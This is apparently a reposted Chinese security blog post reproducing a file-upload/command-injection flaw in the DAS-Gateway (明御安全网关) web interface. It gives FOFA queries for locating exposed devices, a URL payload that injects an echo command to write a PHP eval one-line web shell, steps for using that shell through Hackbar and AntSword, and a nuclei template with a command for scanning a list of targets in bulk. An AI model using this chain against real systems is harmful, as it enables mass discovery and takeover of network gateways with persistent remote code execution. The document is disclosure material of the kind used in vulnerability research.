「fofa语法」
# FOFA语法
title
==
"明御安全网关"
body
=
"/webui/images/basic/login/"
&& title==
"明御安全网关"
「漏洞复现」
步骤一:随便搞一个网站过来并拼接以下路径回车访问,如果出现以下页面内容则说明存在文件上传漏洞....
http:
//
IP/webui/?$type=
1
&bkg_flag=
0
&g=aaa_portal_auth_local_submit&suffix=
1
|echo+%22%3C%3fphp+
eval
($_POST[%22a%22])?%3E%22+%3E+.xxx.php
步骤二:以上POC则是写入了一句话木马到目标服务器中名字为.xxx.php
...这里可借助Hackbar来验证!!!
# 请求路径
http://IP/webui/.xxx.php
# POST发送数据
a=phpinfo();
步骤三:直接使用蚁剑连接成功...
「程序编写」
id
:
mingyu_upload
info
:
name
:
mingyu_upload
author
:
joyboy
severity
:
critical
description
:
http://xxx.xxx.xxx/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval($_POST["a"]);?>"+>+.xxx.php
metadata
:
:
1
:
title="明御安全网关"
verified
:
true
CVE
:
tags
:
明御安全网关,uploadfile
requests
:
raw:
|
GET
/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval($_POST["a"]);?>"+>+.xxx.php HTTP/1.1
Host
:
{{Hostname}}
matchers
:
type: word
part
:
body
words
:
'success'
#
nuclei
执行命令
nuclei
.exe
-t
mingyu_upload
.yaml
-l
url
.txt
-stats
原文始发于微信公众号(揽月安全团队):安恒明御安全网关文件上传
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论